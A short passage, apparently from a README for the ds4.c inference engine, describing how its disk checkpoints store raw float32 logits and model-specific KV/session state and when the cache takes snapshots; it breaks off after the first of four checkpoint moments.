The logits are raw IEEE-754 ﬂoat32 values from the host ds4_session buffer. They are saved immediately after the checkpoint tokens so a loaded snapshot can sample or continue from the exact next-token distribution without running one extra decode step. MTP draft logits/state are not persisted; after loading a disk checkpoint the draft state is invalidated and rebuilt by normal generation.

The tensor payload is DS4-speciﬁc KV/session state, not a generic inference graph dump. It is expected to be portable only across compatible ds4.c builds for this model layout.

The cache stores checkpoints at four moments:

cold: after a long ﬁrst prompt reaches a stable preﬁx, before generation.

Read more Read the original on github.com →

Read the original on github.com →

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